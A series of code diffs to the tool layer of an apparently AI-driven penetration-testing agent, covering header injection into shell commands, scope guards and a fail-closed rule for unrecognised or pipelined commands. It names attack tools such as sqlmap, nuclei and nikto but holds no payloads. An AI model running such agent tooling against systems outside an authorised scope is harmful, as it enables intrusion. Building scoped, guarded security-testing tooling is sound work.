+++ b/src/core/agents/offSecAgent/tools/crawlAuthenticated.ts
@@ -5,7 +5,11 @@ import {
   type EndpointInfo,
   extractJavascriptEndpoints,
 } from "../../specialized/attackSurface/jsExtraction";
-import { assertUrlInScope, ScopeViolationError } from "./scopeGuard";
+import {
+  assertUrlInScope,
+  resolverSessionFromCtx,
+  ScopeViolationError,
+} from "./scopeGuard";
 import type { ToolContext } from "./types";
 
 /**
@@ -68,10 +72,14 @@ export function crawlAuthenticated(ctx: ToolContext) {
           visited.add(url);
 
           try {
-            const pageResult = await targetFetch(ctx.session, url, {
-              method: "GET",
-              headers: { cookie: sessionCookie },
-            });
+            const pageResult = await targetFetch(
+              resolverSessionFromCtx(ctx),
+              url,
+              {
+                method: "GET",
+                headers: { cookie: sessionCookie },
+              },
+            );
 
             if (pageResult.status >= 200 && pageResult.status < 400) {
               const html = await pageResult.text();

--- a/src/core/agents/offSecAgent/tools/detectAuthScheme.ts
+++ b/src/core/agents/offSecAgent/tools/detectAuthScheme.ts
@@ -1,5 +1,6 @@
 import { tool } from "ai";
 import { z } from "zod";
+import { targetFetch } from "../../../http/targetHeaders";
 import type { ToolContext } from "./types";
 
 /**
@@ -32,7 +33,7 @@ Returns detected scheme and required fields for authentication.`,
     }),
     execute: async ({ endpoint }) => {
       try {
-        const response = await fetch(endpoint, {
+        const response = await targetFetch(ctx.session, endpoint, {
           method: "GET",
           redirect: "manual",
           signal: ctx.abortSignal,

--- a/src/core/agents/offSecAgent/tools/detectAuthScheme.ts
+++ b/src/core/agents/offSecAgent/tools/detectAuthScheme.ts
@@ -1,6 +1,7 @@
 import { tool } from "ai";
 import { z } from "zod";
 import { targetFetch } from "../../../http/targetHeaders";
+import { resolverSessionFromCtx } from "./scopeGuard";
 import type { ToolContext } from "./types";
 
 /**
@@ -33,11 +34,15 @@ Returns detected scheme and required fields for authentication.`,
     }),
     execute: async ({ endpoint }) => {
       try {
-        const response = await targetFetch(ctx.session, endpoint, {
-          method: "GET",
-          redirect: "manual",
-          signal: ctx.abortSignal,
-        });
+        const response = await targetFetch(
+          resolverSessionFromCtx(ctx),
+          endpoint,
+          {
+            method: "GET",
+            redirect: "manual",
+            signal: ctx.abortSignal,
+          },
+        );
 
         const body = await response.text();
         const bodyLower = body.toLowerCase();

--- a/src/core/agents/offSecAgent/tools/email/adapters.ts
+++ b/src/core/agents/offSecAgent/tools/email/adapters.ts
@@ -481,6 +481,7 @@ class OutlookAdapter implements EmailAdapter {
         }
         const body = new URLSearchParams(params);
 
+        // biome-ignore lint/style/noRestrictedGlobals: Microsoft OAuth (not the pentest target); must not pass through targetFetch.
         const res = await fetch(
           "https://login.microsoftonline.com/common/oauth2/v2.0/token",
           { method: "POST", body },

--- a/src/core/agents/offSecAgent/tools/executeCommand.ts
+++ b/src/core/agents/offSecAgent/tools/executeCommand.ts
@@ -197,12 +197,9 @@ IMPORTANT: Always analyze results and adjust your approach based on findings.`,
         throw e;
       }
 
-      // INV-shell-injection: every shell command that targets an
-      // in-scope host MUST receive the session's configured custom HTTP
-      // headers. The injector handles recognized tools (curl, nuclei,
-      // ffuf, etc.). When the tool is unknown or the command is
-      // pipelined we fail closed unless the agent explicitly opts out
-      // via `allow_unprotected`.
+      // Inject session headers into the shell command. Fail closed for
+      // unknown tools / pipelines so configured headers aren't silently
+      // dropped — agent can opt out with `allow_unprotected`.
       const cmdHosts = extractHostsFromCommand(command);
       const inject = applyHeadersToShellCommand(
         command,
@@ -210,11 +207,6 @@ IMPORTANT: Always analyze results and adjust your approach based on findings.`,
         cmdHosts,
       );
       if (inject.status === "unknown-tool" && !allow_unprotected) {
-        // `applyHeadersToShellCommand` only returns `unknown-tool` when
-        // there ARE headers configured for an in-scope host on the
-        // command (the `no-headers` status covers both "no in-scope
-        // host" and "in-scope but no headers"). Reaching this branch
-        // means we must fail closed.
         const msg =
           "Command rejected: configured custom HTTP headers cannot be injected because the tool is unrecognized or the command is pipelined. " +
           "Supported HTTP tools: curl, wget, nuclei, ffuf, gobuster, httpx, feroxbuster, dirb, wfuzz, wpscan, sqlmap, nikto. " +

--- a/src/core/agents/offSecAgent/tools/executeCommand.ts
+++ b/src/core/agents/offSecAgent/tools/executeCommand.ts
@@ -2,10 +2,7 @@ import { tool } from "ai";
 import { existsSync, mkdirSync, writeFileSync } from "fs";
 import { join } from "path";
 import { z } from "zod";
-import {
-  applyHeadersToShellCommand,
-  resolveEffectiveHeaders,
-} from "../../../http/targetHeaders";
+import { applyHeadersToShellCommand } from "../../../http/targetHeaders";
 import {
   assertCommandInScope,
   extractHostsFromCommand,
@@ -208,27 +205,22 @@ IMPORTANT: Always analyze results and adjust your approach based on findings.`,
       const cmdHosts = extractHostsFromCommand(command);
       const inject = applyHeadersToShellCommand(command, ctx.session, cmdHosts);
       if (inject.status === "unknown-tool" && !allow_unprotected) {
-        // Only block when there are actually headers to apply for the
-        // hosts on this command line. `applyHeadersToShellCommand`
-        // returns `unknown-tool` even when no headers are configured.
-        const hasHeaders = cmdHosts.some((h) => {
-          if (!h) return false;
-          const resolved = resolveEffectiveHeaders(ctx.session, `https://${h}`);
-          return Object.keys(resolved).length > 0;
-        });
-        if (hasHeaders) {
-          const msg =
-            "Command rejected: configured custom HTTP headers cannot be injected because the tool is unrecognized or the command is pipelined. " +
-            "Supported HTTP tools: curl, wget, nuclei, ffuf, gobuster, httpx, feroxbuster, dirb, wfuzz, wpscan, sqlmap, nikto. " +
-            "Either (a) rewrite the command using one of those tools, (b) use the http_request tool, or (c) pass allow_unprotected: true to acknowledge headers will NOT be sent.";
-          return {
-            success: false,
-            error: msg,
-            stdout: "",
-            stderr: msg,
-            command,
-          };
-        }
+        // `applyHeadersToShellCommand` only returns `unknown-tool` when
+        // there ARE headers configured for an in-scope host on the
+        // command (the `no-headers` status covers both "no in-scope
+        // host" and "in-scope but no headers"). Reaching this branch
+        // means we must fail closed.
+        const msg =
+          "Command rejected: configured custom HTTP headers cannot be injected because the tool is unrecognized or the command is pipelined. " +
+          "Supported HTTP tools: curl, wget, nuclei, ffuf, gobuster, httpx, feroxbuster, dirb, wfuzz, wpscan, sqlmap, nikto. " +
+          "Either (a) rewrite the command using one of those tools, (b) use the http_request tool, or (c) pass allow_unprotected: true to acknowledge headers will NOT be sent.";
+        return {
+          success: false,
+          error: msg,
+          stdout: "",
+          stderr: msg,
+          command,
+        };
       }
       const effectiveCommand =
         inject.status === "injected" ? inject.command : command;

--- a/src/core/agents/offSecAgent/tools/executeCommand.ts
+++ b/src/core/agents/offSecAgent/tools/executeCommand.ts
@@ -2,7 +2,15 @@ import { tool } from "ai";
 import { existsSync, mkdirSync, writeFileSync } from "fs";
 import { join } from "path";
 import { z } from "zod";
-import { assertCommandInScope, ScopeViolationError } from "./scopeGuard";
+import {
+  applyHeadersToShellCommand,
+  resolveEffectiveHeaders,
+} from "../../../http/targetHeaders";
+import {
+  assertCommandInScope,
+  extractHostsFromCommand,
+  ScopeViolationError,
+} from "./scopeGuard";
 import type { ToolContext } from "./types";
 
 const MAX_INLINE = 50_000;
@@ -21,6 +29,12 @@ const executeCommandInputSchema = z.object({
     .optional()
     .describe(
       "Timeout in seconds. If omitted, the command runs until completion or abort.",
+    ),
+  allow_unprotected: z
+    .boolean()
+    .optional()
+    .describe(
+      "Acknowledge that this command will run WITHOUT the session's configured custom HTTP headers because the tool is unrecognized or the command is pipelined. Defaults to false (fail-closed). Use only when you understand the headers will not be applied.",
     ),
 });
 
@@ -155,7 +169,11 @@ results to disk before any signal arrives.
 
 IMPORTANT: Always analyze results and adjust your approach based on findings.`,
     inputSchema: executeCommandInputSchema,
-    execute: async ({ command, timeout }): Promise<ExecuteCommandResult> => {
+    execute: async ({
+      command,
+      timeout,
+      allow_unprotected,
+    }): Promise<ExecuteCommandResult> => {
       if (ctx.abortSignal?.aborted) {
         return {
           success: false,
@@ -181,6 +199,41 @@ IMPORTANT: Always analyze results and adjust your approach based on findings.`,
         throw e;
       }
 
+      // INV-shell-injection: every shell command that targets an
+      // in-scope host MUST receive the session's configured custom HTTP
+      // headers. The injector handles recognized tools (curl, nuclei,
+      // ffuf, etc.). When the tool is unknown or the command is
+      // pipelined we fail closed unless the agent explicitly opts out
+      // via `allow_unprotected`.
+      const cmdHosts = extractHostsFromCommand(command);
+      const inject = applyHeadersToShellCommand(command, ctx.session, cmdHosts);
+      if (inject.status === "unknown-tool" && !allow_unprotected) {
+        // Only block when there are actually headers to apply for the
+        // hosts on this command line. `applyHeadersToShellCommand`
+        // returns `unknown-tool` even when no headers are configured.
+        const sampleHost = cmdHosts.find((h) => h.length > 0);
+        const probeUrl = sampleHost ? `https://${sampleHost}` : "";
+        const resolved = probeUrl
+          ? resolveEffectiveHeaders(ctx.session, probeUrl)
+          : null;
+        const hasHeaders = resolved ? resolved.entries.length > 0 : false;
+        if (hasHeaders) {
+          const msg =
+            "Command rejected: configured custom HTTP headers cannot be injected because the tool is unrecognized or the command is pipelined. " +
+            "Supported HTTP tools: curl, wget, nuclei, ffuf, gobuster, httpx, feroxbuster, dirb, wfuzz, wpscan, sqlmap, nikto. " +
+            "Either (a) rewrite the command using one of those tools, (b) use the http_request tool, or (c) pass allow_unprotected: true to acknowledge headers will NOT be sent.";
+          return {
+            success: false,
+            error: msg,
+            stdout: "",
+            stderr: msg,
+            command,
+          };
+        }
+      }
+      const effectiveCommand =
+        inject.status === "injected" ? inject.command : command;
+
       // Sandbox mode: route execution through the sandbox
       if (ctx.sandbox) {
         try {
@@ -189,7 +242,7 @@ IMPORTANT: Always analyze results and adjust your approach based on findings.`,
           if (normalizedTimeout != null) {
             ssmOpts.timeout = normalizedTimeout;
           }
-          const result = await ctx.sandbox.execute(command, ssmOpts);
+          const result = await ctx.sandbox.execute(effectiveCommand, ssmOpts);
           const { text: stdout, file: outputFile } = maybeSaveFullOutput(
             result.stdout,
             ctx,
@@ -199,7 +252,7 @@ IMPORTANT: Always analyze results and adjust your approach based on findings.`,
             error: !result.success ? result.stderr || "Command failed" : "",
             stdout,
             stderr: result.stderr || "",
-            command,
+            command: effectiveCommand,
             outputFile,
           };
         } catch (error: unknown) {
@@ -209,7 +262,7 @@ IMPORTANT: Always analyze results and adjust your approach based on findings.`,
             error: msg,
             stdout: "",
             stderr: msg,
-            command,
+            command: effectiveCommand,
           };
         }
       }
@@ -222,7 +275,7 @@ IMPORTANT: Always analyze results and adjust your approach based on findings.`,
             ? (data: string) => ctx.eventBus!.emit("command-output", { data })
             : undefined;
           const result = await ctx.persistentShell.execute(
-            command,
+            effectiveCommand,
             normalizedTimeout,
             onData,
             ctx.abortSignal,
@@ -241,7 +294,7 @@ IMPORTANT: Always analyze results and adjust your approach based on findings.`,
                   : "",
             stdout,
             stderr: result.stderr,
-            command,
+            command: effectiveCommand,
             outputFile,
           };
         } catch (error: unknown) {
@@ -251,7 +304,7 @@ IMPORTANT: Always analyze results and adjust your approach based on findings.`,
             error: msg,
             stdout: "",
             stderr: msg,
-            command,
+            command: effectiveCommand,
           };
         }
       }

--- a/src/core/agents/offSecAgent/tools/executeCommand.ts
+++ b/src/core/agents/offSecAgent/tools/executeCommand.ts
@@ -211,12 +211,11 @@ IMPORTANT: Always analyze results and adjust your approach based on findings.`,
         // Only block when there are actually headers to apply for the
         // hosts on this command line. `applyHeadersToShellCommand`
         // returns `unknown-tool` even when no headers are configured.
-        const sampleHost = cmdHosts.find((h) => h.length > 0);
-        const probeUrl = sampleHost ? `https://${sampleHost}` : "";
-        const resolved = probeUrl
-          ? resolveEffectiveHeaders(ctx.session, probeUrl)
-          : null;
-        const hasHeaders = resolved ? Object.keys(resolved).length > 0 : false;
+        const hasHeaders = cmdHosts.some((h) => {
+          if (!h) return false;
+          const resolved = resolveEffectiveHeaders(ctx.session, `https://${h}`);
+          return Object.keys(resolved).length > 0;
+        });
         if (hasHeaders) {
           const msg =
             "Command rejected: configured custom HTTP headers cannot be injected because the tool is unrecognized or the command is pipelined. " +

--- a/src/core/agents/offSecAgent/tools/executeCommand.ts
+++ b/src/core/agents/offSecAgent/tools/executeCommand.ts
@@ -248,7 +248,7 @@ IMPORTANT: Always analyze results and adjust your approach based on findings.`,
             error: !result.success ? result.stderr || "Command failed" : "",
             stdout,
             stderr: result.stderr || "",
-            command: effectiveCommand,
+            command,
             outputFile,
           };
         } catch (error: unknown) {
@@ -258,7 +258,7 @@ IMPORTANT: Always analyze results and adjust your approach based on findings.`,
             error: msg,
             stdout: "",
             stderr: msg,
-            command: effectiveCommand,
+            command,
           };
         }
       }
@@ -290,7 +290,7 @@ IMPORTANT: Always analyze results and adjust your approach based on findings.`,
                   : "",
             stdout,
             stderr: result.stderr,
-            command: effectiveCommand,
+            command,
             outputFile,
           };
         } catch (error: unknown) {
@@ -300,7 +300,7 @@ IMPORTANT: Always analyze results and adjust your approach based on findings.`,
             error: msg,
             stdout: "",
             stderr: msg,
-            command: effectiveCommand,
+            command,
           };
         }
       }

--- a/src/core/agents/offSecAgent/tools/executeCommand.ts
+++ b/src/core/agents/offSecAgent/tools/executeCommand.ts
@@ -216,7 +216,7 @@ IMPORTANT: Always analyze results and adjust your approach based on findings.`,
         const resolved = probeUrl
           ? resolveEffectiveHeaders(ctx.session, probeUrl)
           : null;
-        const hasHeaders = resolved ? resolved.entries.length > 0 : false;
+        const hasHeaders = resolved ? Object.keys(resolved).length > 0 : false;
         if (hasHeaders) {
           const msg =
             "Command rejected: configured custom HTTP headers cannot be injected because the tool is unrecognized or the command is pipelined. " +

--- a/src/core/agents/offSecAgent/tools/executeCommand.ts
+++ b/src/core/agents/offSecAgent/tools/executeCommand.ts
@@ -6,6 +6,7 @@ import { applyHeadersToShellCommand } from "../../../http/targetHeaders";
 import {
   assertCommandInScope,
   extractHostsFromCommand,
+  resolverSessionFromCtx,
   ScopeViolationError,
 } from "./scopeGuard";
 import type { ToolContext } from "./types";
@@ -203,7 +204,11 @@ IMPORTANT: Always analyze results and adjust your approach based on findings.`,
       // pipelined we fail closed unless the agent explicitly opts out
       // via `allow_unprotected`.
       const cmdHosts = extractHostsFromCommand(command);
-      const inject = applyHeadersToShellCommand(command, ctx.session, cmdHosts);
+      const inject = applyHeadersToShellCommand(
+        command,
+        resolverSessionFromCtx(ctx),
+        cmdHosts,
+      );
       if (inject.status === "unknown-tool" && !allow_unprotected) {
         // `applyHeadersToShellCommand` only returns `unknown-tool` when
         // there ARE headers configured for an in-scope host on the

--- a/src/core/agents/offSecAgent/tools/getPage.ts
+++ b/src/core/agents/offSecAgent/tools/getPage.ts
@@ -1,9 +1,6 @@
 import { tool } from "ai";
 import { z } from "zod";
-import {
-  resolveEffectiveHeaders,
-  targetFetch,
-} from "../../../http/targetHeaders";
+import { resolveEffectiveHeaders } from "../../../http/targetHeaders";
 import type { HeaderRecord } from "../../../http/types";
 import { resolverSessionFromCtx } from "./scopeGuard";
 import type { ToolContext } from "./types";
@@ -125,15 +122,15 @@ BEST PRACTICES:
           ? AbortSignal.any([ctx.abortSignal, controller.signal])
           : controller.signal;
 
-        // Two-phase merge: resolve session/credential headers first,
-        // then fill in tool baselines only for keys the resolver didn't
-        // produce. This is intentionally two calls — baselines must
-        // LOSE to session headers, but the request layer in
-        // resolveEffectiveHeaders WINS. Merging outside gives the
-        // correct precedence: session > baseline > nothing.
-        // The second resolve inside targetFetch is a no-op (idempotent)
-        // since the merged set already equals what the resolver would
-        // produce with these as the request layer.
+        // Resolve session/credential headers, then fill in tool baselines
+        // only for keys the resolver didn't produce. Baselines (User-Agent,
+        // Accept, Accept-Language) must LOSE to session/credential headers
+        // to avoid overriding operator-configured values.
+        //
+        // We call fetch directly rather than targetFetch because resolution
+        // is already complete — routing through targetFetch would re-resolve,
+        // promoting baselines into the request layer where they'd override
+        // credential-layer headers of the same name.
         const resolverSession = resolverSessionFromCtx(ctx);
         const resolved = resolveEffectiveHeaders(resolverSession, url);
         const headers = mergeBaselineHeaders(
@@ -141,7 +138,8 @@ BEST PRACTICES:
           BASELINE_REQUEST_HEADERS,
         );
 
-        const response = await targetFetch(resolverSession, url, {
+        // biome-ignore lint/style/noRestrictedGlobals: headers already fully resolved above; targetFetch would re-resolve and misorder baseline vs credential precedence
+        const response = await fetch(url, {
           method: "GET",
           headers,
           signal: combinedSignal,

--- a/src/core/agents/offSecAgent/tools/getPage.ts
+++ b/src/core/agents/offSecAgent/tools/getPage.ts
@@ -1,8 +1,38 @@
 import { tool } from "ai";
 import { z } from "zod";
-import { targetFetch } from "../../../http/targetHeaders";
+import {
+  resolveEffectiveHeaders,
+  targetFetch,
+} from "../../../http/targetHeaders";
+import type { HeaderRecord } from "../../../http/types";
 import { resolverSessionFromCtx } from "./scopeGuard";
 import type { ToolContext } from "./types";
+
+// Tool-specific baseline headers applied only when the resolver did not
+// already produce them. For in-scope target URLs this respects
+// session/global/credential headers (INV-single-source). For
+// out-of-scope research URLs (CVE writeups, vendor docs, security
+// blogs — the dominant use case for this tool) it ensures we still
+// send a recognisable User-Agent rather than relying on the runtime's
+// default (e.g. `Bun/x.y`), which Cloudflare/Akamai-fronted sources
+// frequently challenge.
+const BASELINE_REQUEST_HEADERS: HeaderRecord = {
+  "User-Agent": "Mozilla/5.0 (compatible; PensarBot/1.0; +https://pensar.dev)",
+  Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+  "Accept-Language": "en-US,en;q=0.5",
+};
+
+function mergeBaselineHeaders(
+  resolved: HeaderRecord,
+  baseline: HeaderRecord,
+): HeaderRecord {
+  const present = new Set(Object.keys(resolved).map((k) => k.toLowerCase()));
+  const out: HeaderRecord = { ...resolved };
+  for (const [name, value] of Object.entries(baseline)) {
+    if (!present.has(name.toLowerCase())) out[name] = value;
+  }
+  return out;
+}
 
 const MAX_CONTENT_LENGTH = 50_000;
 const REQUEST_TIMEOUT = 30_000;
@@ -95,18 +125,21 @@ BEST PRACTICES:
           ? AbortSignal.any([ctx.abortSignal, controller.signal])
           : controller.signal;
 
-        // Identification headers are deliberately omitted here — the
-        // resolver supplies the session/global User-Agent for in-scope
-        // target URLs (INV-single-source). For external/research URLs
-        // (CVE writeups, vendor docs) the resolver returns empty and
-        // the runtime's default UA is used.
-        const response = await targetFetch(resolverSessionFromCtx(ctx), url, {
+        // Resolve session/global/credential headers first, then layer in
+        // tool baselines only for keys the resolver didn't produce. The
+        // assembled set is then handed to targetFetch, which re-resolves
+        // idempotently (caller-layer values already equal the resolved
+        // ones for in-scope URLs).
+        const resolverSession = resolverSessionFromCtx(ctx);
+        const resolved = resolveEffectiveHeaders(resolverSession, url);
+        const headers = mergeBaselineHeaders(
+          resolved,
+          BASELINE_REQUEST_HEADERS,
+        );
+
+        const response = await targetFetch(resolverSession, url, {
           method: "GET",
-          headers: {
-            Accept:
-              "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
-            "Accept-Language": "en-US,en;q=0.5",
-          },
+          headers,
           signal: combinedSignal,
           redirect: "follow",
         });

--- a/src/core/agents/offSecAgent/tools/getPage.ts
+++ b/src/core/agents/offSecAgent/tools/getPage.ts
@@ -13,19 +13,19 @@ import type { ToolContext } from "./types";
 // send a recognisable User-Agent rather than relying on the runtime's
 // default (e.g. `Bun/x.y`), which Cloudflare/Akamai-fronted sources
 // frequently challenge.
-const BASELINE_REQUEST_HEADERS: HeaderRecord = {
-  "User-Agent": "Mozilla/5.0 (compatible; PensarBot/1.0; +https://pensar.dev)",
+const GETPAGE_USER_AGENT =
+  "Mozilla/5.0 (compatible; PensarBot/1.0; +https://pensar.dev)";
+
+const BASELINE_FALLBACK_HEADERS: HeaderRecord = {
   Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
   "Accept-Language": "en-US,en;q=0.5",
 };
 
-function mergeBaselineHeaders(
-  resolved: HeaderRecord,
-  baseline: HeaderRecord,
-): HeaderRecord {
+function mergeBaselineHeaders(resolved: HeaderRecord): HeaderRecord {
   const present = new Set(Object.keys(resolved).map((k) => k.toLowerCase()));
   const out: HeaderRecord = { ...resolved };
-  for (const [name, value] of Object.entries(baseline)) {
+  out["User-Agent"] = GETPAGE_USER_AGENT;
+  for (const [name, value] of Object.entries(BASELINE_FALLBACK_HEADERS)) {
     if (!present.has(name.toLowerCase())) out[name] = value;
   }
   return out;
@@ -133,10 +133,7 @@ BEST PRACTICES:
         // credential-layer headers of the same name.
         const resolverSession = resolverSessionFromCtx(ctx);
         const resolved = resolveEffectiveHeaders(resolverSession, url);
-        const headers = mergeBaselineHeaders(
-          resolved,
-          BASELINE_REQUEST_HEADERS,
-        );
+        const headers = mergeBaselineHeaders(resolved);
 
         // biome-ignore lint/style/noRestrictedGlobals: headers already fully resolved above; targetFetch would re-resolve and misorder baseline vs credential precedence
         const response = await fetch(url, {

--- a/src/core/agents/offSecAgent/tools/getPage.ts
+++ b/src/core/agents/offSecAgent/tools/getPage.ts
@@ -1,5 +1,6 @@
 import { tool } from "ai";
 import { z } from "zod";
+import { targetFetch } from "../../../http/targetHeaders";
 import type { ToolContext } from "./types";
 
 const MAX_CONTENT_LENGTH = 50_000;
@@ -93,11 +94,14 @@ BEST PRACTICES:
           ? AbortSignal.any([ctx.abortSignal, controller.signal])
           : controller.signal;
 
-        const response = await fetch(url, {
+        // Identification headers are deliberately omitted here — the
+        // resolver supplies the session/global User-Agent for in-scope
+        // target URLs (INV-single-source). For external/research URLs
+        // (CVE writeups, vendor docs) the resolver returns empty and
+        // the runtime's default UA is used.
+        const response = await targetFetch(ctx.session, url, {
           method: "GET",
           headers: {
-            "User-Agent":
-              "Mozilla/5.0 (compatible; PensarBot/1.0; +https://pensar.dev)",
             Accept:
               "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
             "Accept-Language": "en-US,en;q=0.5",

--- a/src/core/agents/offSecAgent/tools/getPage.ts
+++ b/src/core/agents/offSecAgent/tools/getPage.ts
@@ -1,6 +1,7 @@
 import { tool } from "ai";
 import { z } from "zod";
 import { targetFetch } from "../../../http/targetHeaders";
+import { resolverSessionFromCtx } from "./scopeGuard";
 import type { ToolContext } from "./types";
 
 const MAX_CONTENT_LENGTH = 50_000;
@@ -99,7 +100,7 @@ BEST PRACTICES:
         // target URLs (INV-single-source). For external/research URLs
         // (CVE writeups, vendor docs) the resolver returns empty and
         // the runtime's default UA is used.
-        const response = await targetFetch(ctx.session, url, {
+        const response = await targetFetch(resolverSessionFromCtx(ctx), url, {
           method: "GET",
           headers: {
             Accept:

--- a/src/core/agents/offSecAgent/tools/getPage.ts
+++ b/src/core/agents/offSecAgent/tools/getPage.ts
@@ -125,11 +125,15 @@ BEST PRACTICES:
           ? AbortSignal.any([ctx.abortSignal, controller.signal])
           : controller.signal;
 
-        // Resolve session/global/credential headers first, then layer in
-        // tool baselines only for keys the resolver didn't produce. The
-        // assembled set is then handed to targetFetch, which re-resolves
-        // idempotently (caller-layer values already equal the resolved
-        // ones for in-scope URLs).
+        // Two-phase merge: resolve session/credential headers first,
+        // then fill in tool baselines only for keys the resolver didn't
+        // produce. This is intentionally two calls — baselines must
+        // LOSE to session headers, but the request layer in
+        // resolveEffectiveHeaders WINS. Merging outside gives the
+        // correct precedence: session > baseline > nothing.
+        // The second resolve inside targetFetch is a no-op (idempotent)
+        // since the merged set already equals what the resolver would
+        // produce with these as the request layer.
         const resolverSession = resolverSessionFromCtx(ctx);
         const resolved = resolveEffectiveHeaders(resolverSession, url);
         const headers = mergeBaselineHeaders(

--- a/src/core/agents/offSecAgent/tools/getPage.ts
+++ b/src/core/agents/offSecAgent/tools/getPage.ts
@@ -5,14 +5,9 @@ import type { HeaderRecord } from "../../../http/types";
 import { resolverSessionFromCtx } from "./scopeGuard";
 import type { ToolContext } from "./types";
 
-// Tool-specific baseline headers applied only when the resolver did not
-// already produce them. For in-scope target URLs this respects
-// session/global/credential headers (INV-single-source). For
-// out-of-scope research URLs (CVE writeups, vendor docs, security
-// blogs — the dominant use case for this tool) it ensures we still
-// send a recognisable User-Agent rather than relying on the runtime's
-// default (e.g. `Bun/x.y`), which Cloudflare/Akamai-fronted sources
-// frequently challenge.
+// Tool baselines used for out-of-scope research URLs (CVE writeups, vendor
+// docs) — a recognisable UA avoids Cloudflare/Akamai bot challenges on
+// `Bun/x.y` defaults. For in-scope URLs the resolver's values win.
 const GETPAGE_USER_AGENT =
   "Mozilla/5.0 (compatible; PensarBot/1.0; +https://pensar.dev)";
 
@@ -122,20 +117,14 @@ BEST PRACTICES:
           ? AbortSignal.any([ctx.abortSignal, controller.signal])
           : controller.signal;
 
-        // Resolve session/credential headers, then fill in tool baselines
-        // only for keys the resolver didn't produce. Baselines (User-Agent,
-        // Accept, Accept-Language) must LOSE to session/credential headers
-        // to avoid overriding operator-configured values.
-        //
-        // We call fetch directly rather than targetFetch because resolution
-        // is already complete — routing through targetFetch would re-resolve,
-        // promoting baselines into the request layer where they'd override
-        // credential-layer headers of the same name.
+        // Resolve once, then layer baselines so resolver values still win.
+        // Calling bare fetch (not targetFetch) avoids a second resolution
+        // pass that would promote baselines above credential headers.
         const resolverSession = resolverSessionFromCtx(ctx);
         const resolved = resolveEffectiveHeaders(resolverSession, url);
         const headers = mergeBaselineHeaders(resolved);
 
-        // biome-ignore lint/style/noRestrictedGlobals: headers already fully resolved above; targetFetch would re-resolve and misorder baseline vs credential precedence
+        // biome-ignore lint/style/noRestrictedGlobals: headers fully resolved above; targetFetch would re-resolve
         const response = await fetch(url, {
           method: "GET",
           headers,

--- a/src/core/agents/offSecAgent/tools/httpRequest.ts
+++ b/src/core/agents/offSecAgent/tools/httpRequest.ts
@@ -7,7 +7,11 @@ import {
   shellQuote,
   targetFetch,
 } from "../../../http/targetHeaders";
-import { assertUrlInScope, ScopeViolationError } from "./scopeGuard";
+import {
+  assertUrlInScope,
+  resolverSessionFromCtx,
+  ScopeViolationError,
+} from "./scopeGuard";
 import type { ToolContext } from "./types";
 
 const MAX_INLINE_BODY = 5_000;
@@ -192,7 +196,7 @@ COMMON TESTING PATTERNS:
           ? AbortSignal.any([ctx.abortSignal, timeoutController.signal])
           : timeoutController.signal;
 
-        const response = await targetFetch(ctx.session, url, {
+        const response = await targetFetch(resolverSessionFromCtx(ctx), url, {
           method,
           headers,
           body: body || undefined,
@@ -277,7 +281,11 @@ async function executeSandboxHttpRequest(
     // the sandbox curl path enforces the same INV-single-source contract
     // as the local fetch path. Agent-supplied `headers` arg is treated
     // as the `request` layer (wins over global/session/credential).
-    const mergedHeaders = resolveEffectiveHeaders(ctx.session, url, headers);
+    const mergedHeaders = resolveEffectiveHeaders(
+      resolverSessionFromCtx(ctx),
+      url,
+      headers,
+    );
     for (const [key, value] of Object.entries(mergedHeaders)) {
       curlCommand += ` -H "${shellQuote(`${key}: ${value}`)}"`;
     }

--- a/src/core/agents/offSecAgent/tools/httpRequest.ts
+++ b/src/core/agents/offSecAgent/tools/httpRequest.ts
@@ -277,10 +277,8 @@ async function executeSandboxHttpRequest(
   try {
     let curlCommand = `curl -i -X ${method}`;
 
-    // Apply session/global/credential layered headers via the resolver so
-    // the sandbox curl path enforces the same INV-single-source contract
-    // as the local fetch path. Agent-supplied `headers` arg is treated
-    // as the `request` layer (wins over global/session/credential).
+    // Resolve session/credential headers so the sandbox curl path matches
+    // the local fetch path. Caller `headers` win as the request layer.
     const mergedHeaders = resolveEffectiveHeaders(
       resolverSessionFromCtx(ctx),
       url,

--- a/src/core/agents/offSecAgent/tools/httpRequest.ts
+++ b/src/core/agents/offSecAgent/tools/httpRequest.ts
@@ -2,6 +2,10 @@ import { tool } from "ai";
 import { existsSync, mkdirSync, writeFileSync } from "fs";
 import { join } from "path";
 import { z } from "zod";
+import {
+  resolveEffectiveHeaders,
+  targetFetch,
+} from "../../../http/targetHeaders";
 import { assertUrlInScope, ScopeViolationError } from "./scopeGuard";
 import type { ToolContext } from "./types";
 
@@ -187,7 +191,7 @@ COMMON TESTING PATTERNS:
           ? AbortSignal.any([ctx.abortSignal, timeoutController.signal])
           : timeoutController.signal;
 
-        const response = await fetch(url, {
+        const response = await targetFetch(ctx.session, url, {
           method,
           headers,
           body: body || undefined,
@@ -268,10 +272,13 @@ async function executeSandboxHttpRequest(
   try {
     let curlCommand = `curl -i -X ${method}`;
 
-    if (headers) {
-      for (const [key, value] of Object.entries(headers)) {
-        curlCommand += ` -H "${key}: ${value}"`;
-      }
+    // Apply session/global/credential layered headers via the resolver so
+    // the sandbox curl path enforces the same INV-single-source contract
+    // as the local fetch path. Agent-supplied `headers` arg is treated
+    // as the `request` layer (wins over global/session/credential).
+    const mergedHeaders = resolveEffectiveHeaders(ctx.session, url, headers);
+    for (const [key, value] of Object.entries(mergedHeaders)) {
+      curlCommand += ` -H "${key}: ${value}"`;
     }
 
     if (body && ["POST", "PUT", "PATCH"].includes(method)) {

--- a/src/core/agents/offSecAgent/tools/httpRequest.ts
+++ b/src/core/agents/offSecAgent/tools/httpRequest.ts
@@ -4,6 +4,7 @@ import { join } from "path";
 import { z } from "zod";
 import {
   resolveEffectiveHeaders,
+  shellQuote,
   targetFetch,
 } from "../../../http/targetHeaders";
 import { assertUrlInScope, ScopeViolationError } from "./scopeGuard";
@@ -278,7 +279,7 @@ async function executeSandboxHttpRequest(
     // as the `request` layer (wins over global/session/credential).
     const mergedHeaders = resolveEffectiveHeaders(ctx.session, url, headers);
     for (const [key, value] of Object.entries(mergedHeaders)) {
-      curlCommand += ` -H "${key}: ${value}"`;
+      curlCommand += ` -H "${shellQuote(`${key}: ${value}`)}"`;
     }
 
     if (body && ["POST", "PUT", "PATCH"].includes(method)) {

--- a/src/core/agents/offSecAgent/tools/index.ts
+++ b/src/core/agents/offSecAgent/tools/index.ts
@@ -108,6 +108,7 @@ export {
   extractHostsFromCommand,
